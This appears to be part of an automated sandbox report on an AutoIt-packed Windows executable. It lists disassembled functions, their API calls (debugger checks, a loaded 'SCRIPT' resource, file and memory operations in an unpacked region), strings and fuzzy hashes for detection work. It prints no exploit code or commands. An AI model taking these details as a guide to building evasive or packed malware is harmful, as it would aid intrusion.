Uniqueness Score: -1.00%

Function 00B70B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00B70B23

Strings

AutoIt, xrefs: 00B70B17
Error allocating memory., xrefs: 00B70B1C

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 2357751689c210d45cc9ad5fd4cc1b0596877c8711303fe58bda80f2b9cc8299
Instruction ID: dc01ba3bdd1ee8881b0a0249e41d07b5c6e75701e03a4e095ab5b975e86c8a9d
Opcode Fuzzy Hash: 2357751689c210d45cc9ad5fd4cc1b0596877c8711303fe58bda80f2b9cc8299
Instruction Fuzzy Hash: ECE0923224832826D21536547C03F897AC48F06B60F1004F7FB5C555D39EE1689046A9

Uniqueness

Uniqueness Score: -1.00%

Function 00B30D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00B2F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B30D71,?,?,?,00B1100A), ref: 00B2F7CE

IsDebuggerPresent.KERNEL32(?,?,?,00B1100A), ref: 00B30D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B1100A), ref: 00B30D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B30D7F

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: f5cf4fb73df4a24eb91f957857c6d0a48ff2722d1acc6e25ee764a9daa2a3172
Instruction ID: 5a17c38062e626c5d5567ef01525a34ed06b7b14d54834d8b6b63d451103d95b
Opcode Fuzzy Hash: f5cf4fb73df4a24eb91f957857c6d0a48ff2722d1acc6e25ee764a9daa2a3172
Instruction Fuzzy Hash: ECE092702003528BD330AFBCE4183967BE0AF05740F108ABDE886C7665DBB0E4848B91

Uniqueness

Uniqueness Score: -1.00%

Function 029ED798 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 029ED7D5

Strings

0%M, xrefs: 029ED7B5
8%M, xrefs: 029ED7CA

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%M$8%M
API String ID: 1385522511-666571738
Opcode ID: 36b27be9e0a83e9aa98581938c918848fc8ca54e9c586360ab56cc84b83fe9f2
Instruction ID: 061a90423d87063900d7c0366e748bb5f15d16caa99dac11c6035e5f5af005e2
Opcode Fuzzy Hash: 36b27be9e0a83e9aa98581938c918848fc8ca54e9c586360ab56cc84b83fe9f2
Instruction Fuzzy Hash: CCE026B1001A10ABCE07A718BAB4E8A335EBB56320B9012F7D003866909B651441CA6C

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 00BA232C
PostMessageW.USER32 ref: 00BA233F

Part of subcall function 00B7E97B: Sleep.KERNEL32 ref: 00B7E9F3

Strings

Shell_TrayWnd, xrefs: 00BA2325

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: e56ce817e583245e130742fd00e4bbd4058162420605d1f813120a410d121393
Instruction ID: 3b2415471ab3f80309f555fdecf17d3c9a620e731359f86781d10d61f49f709b
Opcode Fuzzy Hash: e56ce817e583245e130742fd00e4bbd4058162420605d1f813120a410d121393
Instruction Fuzzy Hash: CCD01236794310B7E664B770DC0FFCABE54AF15B10F0049567769AB1E0DDF0A801CA54

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 00BA236C
PostMessageW.USER32 ref: 00BA2373

Part of subcall function 00B7E97B: Sleep.KERNEL32 ref: 00B7E9F3

Strings

Shell_TrayWnd, xrefs: 00BA2365

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: b5c9e63619adf448fdd093a1f218cdfb368ff654cbc78d8a91ee0c7390a6d2ae
Instruction ID: e83aa42ee0905d78456f98cc8273a53ace65a9d9b97dfd74bef7f578781c0e49
Opcode Fuzzy Hash: b5c9e63619adf448fdd093a1f218cdfb368ff654cbc78d8a91ee0c7390a6d2ae
Instruction Fuzzy Hash: 37D0C9327813107AE664A7709C0FFCAAA54AB16B10F4049567765AB1E0D9B0A8018A54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: name.exePID: 2504, Parent PID: 1500COMMON

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	0%
Total number of Nodes:	2000
Total number of Limit Nodes:	67

Executed Functions

Function 010109D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 010109DA

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1f08ca79cf923657f7dc79c13fad37cbf5332c9e7f8fbc38244ffcc9b7cf6182
Instruction ID: d5ce4158c3120d101a34a87516a4b64cd36d7887c8592b015cbc10973f14bc98
Opcode Fuzzy Hash: 1f08ca79cf923657f7dc79c13fad37cbf5332c9e7f8fbc38244ffcc9b7cf6182
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00FF42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00FF430D

Part of subcall function 00FF6B57: _wcslen.LIBCMT ref: 00FF6B6A

GetCurrentProcess.KERNEL32(?,0108CB64,00000000,?,?), ref: 00FF4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00FF4429
LoadLibraryA.KERNEL32(kernel32.dll), ref: 00FF4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 00FF4466
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00FF4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 00FF447B
GetSystemInfo.KERNEL32(?,?,?), ref: 00FF44A0

Strings

|O, xrefs: 010336F8
GetNativeSystemInfo, xrefs: 00FF4460
kernel32.dll, xrefs: 00FF444F

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 6528e6c3760cd4318047af913a33b6e12f3efa25f033f85b17d367ae73d3700f
Instruction ID: 68f639e7d744eba39da2287f4739778be592d6c954196a16a2c4950fdf8c8206
Opcode Fuzzy Hash: 6528e6c3760cd4318047af913a33b6e12f3efa25f033f85b17d367ae73d3700f
Instruction Fuzzy Hash: EEA1C53291E2C4CFC732DB6974902E97FE47F66608B08D999D5C1A7A0BD23E4508EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00FF2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 00FF2D07
RegisterClassExW.USER32(00000030), ref: 00FF2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FF2D42
InitCommonControlsEx.COMCTL32(?), ref: 00FF2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FF2D6F
LoadIconW.USER32 ref: 00FF2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FF2D94

Strings

+, xrefs: 00FF2CF0
AutoIt v3 GUI, xrefs: 00FF2D23
TaskbarCreated, xrefs: 00FF2D37
0, xrefs: 00FF2CE9

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: c44bd2482dee7884e58ebe1b64d21e51f69b7e9354622fe4520f5b5e198d9129
Instruction ID: eb3e8d0dfa721c147afb989aeb121487f875591a846369b2972dbdd37efd228d
Opcode Fuzzy Hash: c44bd2482dee7884e58ebe1b64d21e51f69b7e9354622fe4520f5b5e198d9129
Instruction Fuzzy Hash: 4D2106B1D05318EFEB20EFA4E949BDDBBB4FB08704F00811AF591A6284D7BA4540CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0103065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0103039A: CreateFileW.KERNELBASE(00000000,00000000,?,01030704,?,?,00000000), ref: 010303B7

GetLastError.KERNEL32 ref: 0103076F
__dosmaperr.LIBCMT ref: 01030776
GetFileType.KERNELBASE ref: 01030782
GetLastError.KERNEL32 ref: 0103078C
__dosmaperr.LIBCMT ref: 01030795
CloseHandle.KERNEL32(00000000), ref: 010307B5
CloseHandle.KERNEL32(?), ref: 010308FF
GetLastError.KERNEL32 ref: 01030931
__dosmaperr.LIBCMT ref: 01030938

Strings

H, xrefs: 010308BD

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: d9c0cfd520ea85388d49234d937cd659ec6870de2531488a0a1f530a949c97e9
Instruction ID: ee83307d01594ee60d0b9c6fb00a171b808363649195d1f56a525f854df03812
Opcode Fuzzy Hash: d9c0cfd520ea85388d49234d937cd659ec6870de2531488a0a1f530a949c97e9
Instruction Fuzzy Hash: 1DA13732A041098FDF29AF68D851BEE3BE4AB86320F144199F8919B399C7358903CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FF2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 00FF2B8E
LoadCursorW.USER32 ref: 00FF2B9D
LoadIconW.USER32 ref: 00FF2BB3
LoadIconW.USER32 ref: 00FF2BC5
LoadIconW.USER32 ref: 00FF2BD7
LoadImageW.USER32 ref: 00FF2BEF
RegisterClassExW.USER32(?), ref: 00FF2C40

Part of subcall function 00FF2CD4: GetSysColorBrush.USER32 ref: 00FF2D07
Part of subcall function 00FF2CD4: RegisterClassExW.USER32(00000030), ref: 00FF2D31
Part of subcall function 00FF2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FF2D42
Part of subcall function 00FF2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00FF2D5F
Part of subcall function 00FF2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FF2D6F
Part of subcall function 00FF2CD4: LoadIconW.USER32 ref: 00FF2D85
Part of subcall function 00FF2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FF2D94

Strings

0, xrefs: 00FF2C0F
AutoIt v3, xrefs: 00FF2C2F
#, xrefs: 00FF2C16

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 825eb22565fa6714bf2be30d44566bb95d5ab72deb41f5cf2b65b5df6fe33eba
Instruction ID: ea6904b41b105d8d3e6f501f0d5675665684b941703cdfa321c32f785ed2db43
Opcode Fuzzy Hash: 825eb22565fa6714bf2be30d44566bb95d5ab72deb41f5cf2b65b5df6fe33eba
Instruction Fuzzy Hash: 90214C70E00318EFDB209FA5E945AAD7FB5FF48B54F00801AE680A6795D7BA4550DF90

Uniqueness

Uniqueness Score: -1.00%

Function 01028D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 312f352b4a4458247585fd0df3bc676af07877cd72d6a634ce8fd10066ba1855
Instruction ID: 15de3f0b496549d5ed1f5f984a223712a60bb5009ebfae336f35a14979ca5e45
Opcode Fuzzy Hash: 312f352b4a4458247585fd0df3bc676af07877cd72d6a634ce8fd10066ba1855
Instruction Fuzzy Hash: C5C1E479E0426A9FDB519FACC880BEDBFF0AF09314F044089F995A7282C7399941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001926D0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 001927A1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001929C7

Memory Dump Source

Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_name.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 63155b228cbd790225c4dff862d46be7a4e35b2cb375373675a080d0078fc005
Instruction ID: 5cf1e58f1598886dba6b4de8336c79f3c62c72a6ac28d878da87083de2f7da3f
Opcode Fuzzy Hash: 63155b228cbd790225c4dff862d46be7a4e35b2cb375373675a080d0078fc005
Instruction Fuzzy Hash: 74A11670E00219EBDF14CFA4C894BEEBBB5FF48704F208159E601BB280D7759A81DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00FF42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00FF42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FF50AA,?,?,00000000,00000000), ref: 00FF42C9
LoadResource.KERNEL32(?,00000000,?,?,00FF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FF4F20), ref: 010335BE
SizeofResource.KERNEL32(?,00000000,?,?,00FF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FF4F20), ref: 010335D3
LockResource.KERNEL32(00FF50AA,?,?,00FF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00FF4F20,?), ref: 010335E6

Strings

SCRIPT, xrefs: 00FF42BF

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 234dad8e7097f178981a5c3dbe43bfcacb18921baf8e9ea9572d6112e55c29fe
Instruction ID: 75891ef3754d0c22d6a145c7443043d541dffd3f3fe7db891a5b1d2ceb72606c
Opcode Fuzzy Hash: 234dad8e7097f178981a5c3dbe43bfcacb18921baf8e9ea9572d6112e55c29fe
Instruction Fuzzy Hash: 55117C71204704BFE7218B65DD48F6B7BB9EFC5B61F104169B586966A0EB72E8009630

Uniqueness

Uniqueness Score: -1.00%

Function 00FF2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32 ref: 00FF2C91
CreateWindowExW.USER32 ref: 00FF2CB2
ShowWindow.USER32(00000000), ref: 00FF2CC6
ShowWindow.USER32(00000000), ref: 00FF2CCF

Strings

edit, xrefs: 00FF2CAC
AutoIt v3, xrefs: 00FF2C89, 00FF2C8E, 00FF2C8F

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 9dfafd330d0800a17ca11ab20c5a908f9bffbc358f82da882829a0078757e14a
Instruction ID: 8309e7647cfd1e4d7a8d35afdc1b4f8f842cb8441c27b6864475aaeacf13437c
Opcode Fuzzy Hash: 9dfafd330d0800a17ca11ab20c5a908f9bffbc358f82da882829a0078757e14a
Instruction Fuzzy Hash: C0F0B775544290BEFB311717AC08EB73EBDE7C6F54B01805AF980A6595C67A1850DFB0

Uniqueness

Uniqueness Score: -1.00%

Function 00190B40 Relevance: 9.3, APIs: 6, Instructions: 311
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000007,00000000,00000000,?), ref: 00190F12

Memory Dump Source

Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_name.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 95ddebdc80c0388c7879413c4e0cde7b78d1c6233938bd38565f64de7610077d
Instruction ID: 554a10d70f08fc687ace8dd6280619e85745ba1267e63d6c095c27de52ef6326
Opcode Fuzzy Hash: 95ddebdc80c0388c7879413c4e0cde7b78d1c6233938bd38565f64de7610077d
Instruction Fuzzy Hash: E8D10114A24648D7EB24DFB4D854BDEB232EF68700F10A569E10DEB3D0E77A4E41CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 010261FE Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,010182D9,010182D9,?,?,?,0102644F,00000001,00000001,8BE85006), ref: 01026258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0102644F,00000001,00000001,8BE85006,?,?,?), ref: 010262DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 010263D8
__freea.LIBCMT ref: 010263E5

Part of subcall function 01023820: RtlAllocateHeap.NTDLL(00000000,?,010C1444,?,0100FDF5,?,?,00FFA976,00000010,010C1440,00FF13FC,?,00FF13C6,?,00FF1129), ref: 01023852

__freea.LIBCMT ref: 010263EE
__freea.LIBCMT ref: 01026413

Memory Dump Source

Source File: 00000008.00000002.779610474.0000000000FF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000008.00000002.779605449.0000000000FF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.000000000108C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779625064.00000000010B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779636611.00000000010BC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000008.00000002.779641186.00000000010C4000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff0000_name.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 86fbce7dfba021d21be3cd7abf1bd0ef41d54d195556b56f560a9274cf1d52c3
Instruction ID: 60815a981e7f3c8b8bfea0dc79dbcde61fda91dd8cce85ac1a6d9b564780c1da
Opcode Fuzzy Hash: 86fbce7dfba021d21be3cd7abf1bd0ef41d54d195556b56f560a9274cf1d52c3
Instruction Fuzzy Hash: 8051D472600226ABEF258F68CC80EEF7BE9EF45650F1586A9FD85D7140DB36DC44C660

Uniqueness

Uniqueness Score: -1.00%

Function 00192410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00192300: Sleep.KERNELBASE(000001F4), ref: 00192311

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001925A0

Strings

D2J5TF0I3O7D4RJK98328JOBFD57, xrefs: 00192629, 0019262C

Memory Dump Source

Source File: 00000008.00000002.779133927.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_190000_name.jbxd

Similarity

API ID: CreateFileSleep
String ID: D2J5TF0I3O7D4RJK98328JOBFD57
API String ID: 2694422964-1570901577
Opcode ID: 44351ae6fdbc2488f781d41fe5d50ebbaa8f83fadaeda6be5a636a4d7e68d2ec
Instruction ID: c9da54c1e0acbe6d115990c0129a7e03e7ac2811c72d8cfad16ec33d55b25f0d
